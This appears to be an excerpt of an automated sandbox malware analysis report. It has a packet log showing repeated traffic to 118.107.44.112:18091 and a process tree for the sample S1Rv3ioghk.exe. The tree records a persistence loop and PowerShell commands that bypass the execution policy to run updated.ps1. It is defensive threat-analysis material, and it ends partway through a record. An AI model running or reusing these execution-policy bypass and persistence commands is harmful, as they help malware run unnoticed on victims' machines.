                                                                          Dec 27, 2024 09:20:48.229777098 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.233728886 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.233778000 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.233812094 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.237798929 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.237890005 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.237898111 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.241879940 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.241923094 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.241981030 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.246036053 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.246084929 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.246242046 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.250060081 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.250106096 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.250150919 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.254091024 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.254138947 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.254184008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.258157015 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.258222103 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.258280993 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.262221098 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.262264967 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.262348890 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.266271114 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.266319036 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.266391993 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.270368099 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.270405054 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.270486116 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.274578094 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.274625063 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.274707079 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.278520107 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.278563976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.278609037 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.282557011 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.282603025 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.282680988 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.286624908 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.286685944 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.286724091 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.290779114 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.290827036 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.290852070 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.294791937 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.294891119 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.294940948 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.298844099 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.298948050 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.298995972 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.302890062 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.302938938 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.303000927 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.306989908 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.307040930 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.307087898 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.311058998 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.311110973 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.311201096 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.353323936 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.399669886 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.399796009 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.400018930 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.401278973 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.401397943 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.401451111 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.409692049 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.409854889 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.409918070 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.411267042 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.411384106 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.411444902 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.414383888 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.415496111 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.415541887 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.415621042 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.418617964 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.418668985 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.418734074 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.421674013 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.421766996 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.421812057 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.424607038 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.424659014 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.424719095 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.427434921 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.427479029 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.427540064 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.430305004 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.430349112 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.430404902 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.433157921 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.433312893 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.433368921 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.435992002 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.436048985 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.436131001 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.438801050 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.438851118 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.438915014 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.441539049 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.441606045 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.441659927 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.444291115 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.444329023 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.444423914 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.447057962 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.447120905 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.447145939 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.449795008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.449933052 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.449985981 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.452550888 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.452681065 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.452713013 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.455338001 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.455382109 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.455439091 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.509480000 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:49.526423931 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:49.645862103 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:49.645934105 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:51.494102955 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:56.738759995 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:56.858417034 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:56.858443975 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:56.858544111 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:56.858553886 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:57.281172991 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:57.281534910 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:57.401140928 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:07.290869951 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:07.418960094 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:07.828175068 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:07.868889093 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:08.082544088 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:08.202162981 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:08.202176094 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:08.202187061 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:23.884603977 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:24.004281998 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:24.421958923 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:24.462696075 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:24.767067909 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:24.886954069 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:24.886969090 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:24.886996031 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:40.087758064 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:40.208798885 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:40.626523972 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:40.681457996 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:40.694967031 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:40.814749002 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:40.814765930 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:40.814779043 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:56.244400978 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:56.363899946 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:56.781737089 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:56.822113037 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:56.878858089 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:21:56.998492002 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:56.998509884 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:21:56.998526096 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:12.322333097 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:22:12.465228081 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:12.938997030 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:12.994030952 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:22:13.098416090 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:22:13.218050957 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:13.218070030 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:13.218084097 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:28.181927919 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:22:28.301928043 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:28.719065905 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:28.759680986 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:22:28.810729027 CET4979318091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:22:28.930362940 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:28.930376053 CET1809149793118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:22:28.930449009 CET1809149793118.107.44.112192.168.2.4

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:03:19:27
                                                                          Start date:27/12/2024
                                                                          Path:C:\Users\user\Desktop\S1Rv3ioghk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\S1Rv3ioghk.exe"
                                                                          Imagebase:0x400000
                                                                          File size:4'477'216 bytes
                                                                          MD5 hash:FD7EC2C34E2593E4D606E0A9D37E257A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:03:19:28
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:03:19:28
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:03:19:28
                                                                          Start date:27/12/2024
                                                                          Path:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          Imagebase:0x400000
                                                                          File size:649'416 bytes
                                                                          MD5 hash:0922B22053A6D5D9516EA910D34A4771
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:7
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:8
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:9
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x7ff7ccaf0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0xa50000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                          Imagebase:0x240000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                          Imagebase:0xd0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                          Imagebase:0xd0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:03:21:09
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:03:21:09
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:03:21:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0xa50000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:03:21:40
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:03:21:40
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:03:21:40
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0x7ff6ec4b0000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:25
                                                                          Start time:03:22:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:03:22:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:27
                                                                          Start time:03:22:10
                                                                          Start date:27/12/2024
